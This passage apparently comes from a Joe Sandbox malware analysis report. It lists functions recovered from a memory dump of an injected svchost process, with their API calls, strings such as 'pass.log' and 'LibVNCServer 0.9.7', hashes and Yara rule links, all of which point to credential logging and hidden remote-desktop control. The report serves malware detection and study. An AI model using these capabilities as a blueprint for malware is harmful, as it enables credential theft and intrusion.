                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashExistsFile
                                                                                                                                                                                                                    • String ID: 7f1bfde3$pass.log
                                                                                                                                                                                                                    • API String ID: 1760361154-3631098846
                                                                                                                                                                                                                    • Opcode ID: 0f27a7be032a33f1b8d52846a28b0450dff6c1478a75e100e02a8c87b137c549
                                                                                                                                                                                                                    • Instruction ID: cde347b72a7618a63202c6e584855481142a0c40c80e2d4882351e2cace664e9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f27a7be032a33f1b8d52846a28b0450dff6c1478a75e100e02a8c87b137c549
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81112B715046994BC71A8B3CA8A86F7BFE49BC6304B24C6D5ECC987302EA308949C780
                                                                                                                                                                                                                    Function 02C89E20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C89E47
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 02C89EB0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashExistsFile
                                                                                                                                                                                                                    • String ID: 7f1bfc59$pass.log
                                                                                                                                                                                                                    • API String ID: 1760361154-3278540732
                                                                                                                                                                                                                    • Opcode ID: be7b6c987aa3d220cdda1caf0a4590d45fe6b181e66e5c7acfde767982866702
                                                                                                                                                                                                                    • Instruction ID: 2add8cb599504d2a3b1d67521bf6efbf4b2cffcf118477a8d1f83b98a0b0296f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be7b6c987aa3d220cdda1caf0a4590d45fe6b181e66e5c7acfde767982866702
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C112B725046D54BD7168B6CA6A46F3BFE5DBD6305F24C6D8DCCA87300EA308949C780
                                                                                                                                                                                                                    Function 02CA2040 Relevance: 6.3, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                                    • Opcode ID: 375dcdb8f9d8c053798a386486593617f9a7364776c0a6d9b002b71cefc70fbb
                                                                                                                                                                                                                    • Instruction ID: 32decc90f6327c08c48a5e4470352e3794319a5cb4ff2731381c70f0029124e5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 375dcdb8f9d8c053798a386486593617f9a7364776c0a6d9b002b71cefc70fbb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 110140B2A017925FD730DFA998A241BBAD57D8010C359893DD9DB87A04D332EA48D683
                                                                                                                                                                                                                    Function 02C999D0 Relevance: 6.2, APIs: 4, Instructions: 248COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: mallocrealloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 948496778-0
                                                                                                                                                                                                                    • Opcode ID: 617ddba0da475d12365199744d1ab891e5c667aa76b892f5b1f441804cd25320
                                                                                                                                                                                                                    • Instruction ID: 6cde7e2f18e87d6f173b652e2c6a1794951f391c4f574f69ca29a89e7ee0b19a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 617ddba0da475d12365199744d1ab891e5c667aa76b892f5b1f441804cd25320
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA91D072E402559FCF14CF68CD89BAA3BA6FF84305F1445BDED099B342D674A911CBA0
                                                                                                                                                                                                                    Function 02CA29B0 Relevance: 6.2, APIs: 4, Instructions: 248COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: mallocrealloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 948496778-0
                                                                                                                                                                                                                    • Opcode ID: 3d40dffe10013fffd5ae44fd307643510c6ad2ac8a2ee88332ed811f9e5f3228
                                                                                                                                                                                                                    • Instruction ID: 4f4f3afa43a001937bef1278ed365547be65adbf3fd40dbb2645ab194026c166
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d40dffe10013fffd5ae44fd307643510c6ad2ac8a2ee88332ed811f9e5f3228
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD91E371E402168FDB14CF64DC90BEA7BA5EF84309F1445B9ED0A9B345D634AD12CBE1
                                                                                                                                                                                                                    Function 02C9E8C0 Relevance: 6.1, APIs: 4, Instructions: 146COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: closesocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2781271927-0
                                                                                                                                                                                                                    • Opcode ID: c3624851fb6fa9ff8d6a0b37a51e9ad6e4dd1301b963aaafc1a1860065f70463
                                                                                                                                                                                                                    • Instruction ID: 1f5c1bca1454f4497758cdfbd9b6462781be5221fc9b1ed8a8ef1214c8089ceb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3624851fb6fa9ff8d6a0b37a51e9ad6e4dd1301b963aaafc1a1860065f70463
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56510370140B019BCB65CF29C8887D6B7A6FBA5328F75CA1AC46B87294EF31E546CB50
                                                                                                                                                                                                                    Function 02C9BBD0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                                    • String ID: %s (%s)$LibVNCServer 0.9.7$unknown
                                                                                                                                                                                                                    • API String ID: 2111968516-696653274
                                                                                                                                                                                                                    • Opcode ID: 6f2b4592c0379c54cd2e22e6550db7af00e3b4b6c991f6b1c1509ecc040b68af
                                                                                                                                                                                                                    • Instruction ID: f3a6578cfe0d99802cf4209567976f5db84ca5528890942b20ec814025212247
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f2b4592c0379c54cd2e22e6550db7af00e3b4b6c991f6b1c1509ecc040b68af
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA41D631A0465A5FDF01CF28D9A8BE67BA5EF85305F0481F5DD0D9F206DB74A60ACBA0
                                                                                                                                                                                                                    Function 02C81130 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C81152
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 02C8115E
                                                                                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000104), ref: 02C81175
                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02C81196
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ParentTextWindowmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4175915554-0
                                                                                                                                                                                                                    • Opcode ID: b74dd45d2e0e6feeb0b3e40701464a5f39917aee69e9e432651cfb3d86be10e1
                                                                                                                                                                                                                    • Instruction ID: 1c6e0f74244909d4871718247bf6364bebca429c8ae02ae73b286adc8dbb48c1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b74dd45d2e0e6feeb0b3e40701464a5f39917aee69e9e432651cfb3d86be10e1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA01D673F402146BDB10AE69ACC8EE7F39CAB54554F048376ED0CE3141EAB1DA5586E0
                                                                                                                                                                                                                    Function 02C87A10 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,?), ref: 02C87A23
                                                                                                                                                                                                                      • Part of subcall function 02C82CE0: GetProcessHeap.KERNEL32(00000008,02C7FB17,02C7FB03,?,02C87515,?,?,?), ref: 02C82CF1
                                                                                                                                                                                                                      • Part of subcall function 02C82CE0: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 02C82CF8
                                                                                                                                                                                                                      • Part of subcall function 02C82CE0: memset.MSVCRT ref: 02C82D08
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,?,?,02C7E885,?), ref: 02C87A3E
                                                                                                                                                                                                                      • Part of subcall function 02C8CBC0: memset.MSVCRT ref: 02C8CBE1
                                                                                                                                                                                                                      • Part of subcall function 02C8CBC0: StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02C8CC19
                                                                                                                                                                                                                      • Part of subcall function 02C8CBC0: PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8CC4D
                                                                                                                                                                                                                      • Part of subcall function 02C8CBC0: PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8CC83
                                                                                                                                                                                                                      • Part of subcall function 02C8CBC0: PathFileExistsA.SHLWAPI(00000000,7F1BFC0D), ref: 02C8CCC9
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B23
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B36
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B49
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92B77
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92BAD
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: CreateDirectoryA.KERNEL32(?,00000000,02CCAFC0), ref: 02C92BC2
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: GetLastError.KERNEL32 ref: 02C92BCC
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: IsUserAnAdmin.SHELL32 ref: 02C92BD4
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92BE5
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: SetLastError.KERNEL32(00000000), ref: 02C92BEC
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: SetCurrentDirectoryA.KERNEL32(?), ref: 02C92BF9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$Backslash$strstr$DirectoryErrorHeapLastmemset$AdminAllocCreateCurrentExistsFileFolderMakeProcessReadSystemUsermemcpy
                                                                                                                                                                                                                    • String ID: GET $POST
                                                                                                                                                                                                                    • API String ID: 633840608-2494278042
                                                                                                                                                                                                                    • Opcode ID: b333c78d3a20b6ffcc49741ddd97b3878b23029b73683a5636a6cd11ab24f6df
                                                                                                                                                                                                                    • Instruction ID: 454c8b4f1ef71aedd1db641b8b7ff59109e943cb5a645da23fe2aedae5e37bcd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b333c78d3a20b6ffcc49741ddd97b3878b23029b73683a5636a6cd11ab24f6df
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF0283688169136993175A49C84EFFE68D9E93B8CB20A11AE84462100FB39EB0495E6
                                                                                                                                                                                                                    Function 02C74000 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000020,7622F380,-00000010,?,02C7429D,?), ref: 02C7400C
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C7429D,?), ref: 02C74013
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C74052
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                                    • String ID: %d.%d.%d.%d
                                                                                                                                                                                                                    • API String ID: 1060465051-3491811756
                                                                                                                                                                                                                    • Opcode ID: 90f3bffe25918d38bde9a53b8fcd34ac64d1cc177bba7861125c9af0dd738d5d
                                                                                                                                                                                                                    • Instruction ID: b501dc9029d853eb5de918cf6f5f699e1cdf3f06e2e433a3f3b2e217bf1b4a7d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90f3bffe25918d38bde9a53b8fcd34ac64d1cc177bba7861125c9af0dd738d5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55F08CB1940760AFC371CF6A9804B66BBE8EF0C701F00892EF69AC7241E23496008BA4
                                                                                                                                                                                                                    Function 02C891C0 Relevance: 6.0, APIs: 4, Instructions: 37synchronizationthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000,75AF7390,?,?,02C85BC4), ref: 02C891DA
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C891F4
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,?,?,02C85BC4), ref: 02C8920C
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,02C85BC4), ref: 02C8921D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHandle$CloseInformationMutexThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3835061634-0
                                                                                                                                                                                                                    • Opcode ID: 09be646a70fb30ee82f280bf00f80ed7ea9f50fea8c1221e81edf7dc80c5b21b
                                                                                                                                                                                                                    • Instruction ID: 4e8631e050a50982036c6b7776b7dda47c50071a89984e1eb5ade44873145600
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09be646a70fb30ee82f280bf00f80ed7ea9f50fea8c1221e81edf7dc80c5b21b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8F0BB31EC1314B7E7119BA4FC0AB667A9CEB05F14F184695F901E72C0D7B095108796
                                                                                                                                                                                                                    Function 02C8A2A0 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000,?,?,02C876BE,00000000,02C7FB03,7f1bfc59,?,?,?,?,?,?), ref: 02C8A2B0
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8A150,00000000,00000000,00000000), ref: 02C8A2C5
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C876BE,00000000,02C7FB03), ref: 02C8A2E3
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,02C876BE,00000000,02C7FB03), ref: 02C8A2F4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1825730051-0
                                                                                                                                                                                                                    • Opcode ID: e7951d6158d0f023cb3298f9ca6ecdf0ccdd31ecffba0421fa871bdc5e41cfdb
                                                                                                                                                                                                                    • Instruction ID: 7759032f49a377ce48a3e10749932e5de361918053dd698e3838140c36dd71ea
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7951d6158d0f023cb3298f9ca6ecdf0ccdd31ecffba0421fa871bdc5e41cfdb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F0B430EC0345BBE730EB65AC0AB5577ACAB0CB09F208686F909E31C0DBB096108A65
                                                                                                                                                                                                                    Function 02C8E830 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000,?,?,02C8790E,00000000,02C7FB03,7f1bfde3,?,?,?,?,?,?), ref: 02C8E840
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8E6E0,00000000,00000000,00000000), ref: 02C8E855
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C8790E,00000000,02C7FB03), ref: 02C8E873
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,02C8790E,00000000,02C7FB03), ref: 02C8E884
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1825730051-0
                                                                                                                                                                                                                    • Opcode ID: 8ca719e807d88b0a1ccc0abb404333eca5f52df640138c7b2b3827763e3e069d
                                                                                                                                                                                                                    • Instruction ID: d615bfe10b210424d3e604edf11a4273885034ed02a1762a4227eef9c07d4bed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ca719e807d88b0a1ccc0abb404333eca5f52df640138c7b2b3827763e3e069d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EF0B430EC0314BBE7209B68AC0AB5D779CEF04749F244694FD05E31C0DBB0D6108A64
                                                                                                                                                                                                                    Function 02C8D930 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000,?,?,02C8785E,00000000,02C7FB03,7f1bfd65,?,?,?,?,?,?), ref: 02C8D940
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8D7E0,00000000,00000000,00000000), ref: 02C8D955
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C8785E,00000000,02C7FB03), ref: 02C8D973
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,02C8785E,00000000,02C7FB03), ref: 02C8D984
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1825730051-0
                                                                                                                                                                                                                    • Opcode ID: d5bc30f6507bf9191a570039fe9a7bc5770d9045f46682a713c508e82709490d
                                                                                                                                                                                                                    • Instruction ID: 2f326863c8cd02590b19e2f8b904345b89ea7561fb1a108660138517cc8e40b9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5bc30f6507bf9191a570039fe9a7bc5770d9045f46682a713c508e82709490d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FEF0B470EC0304B7E7209B75AD0AF55B69C9B04B59F144694F90AE31C4DBB09610CB64
                                                                                                                                                                                                                    Function 02C8E250 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: private$public
                                                                                                                                                                                                                    • API String ID: 0-4176808989
                                                                                                                                                                                                                    • Opcode ID: 95edc4579f270cfbb72ce7a2e89be70b5a00897b7fb9d6ab8d0e8bae2bfc8fae
                                                                                                                                                                                                                    • Instruction ID: ec1e89868abdafde7671aa854f668a39e363cdb733b1ccd60b70895c1776268f
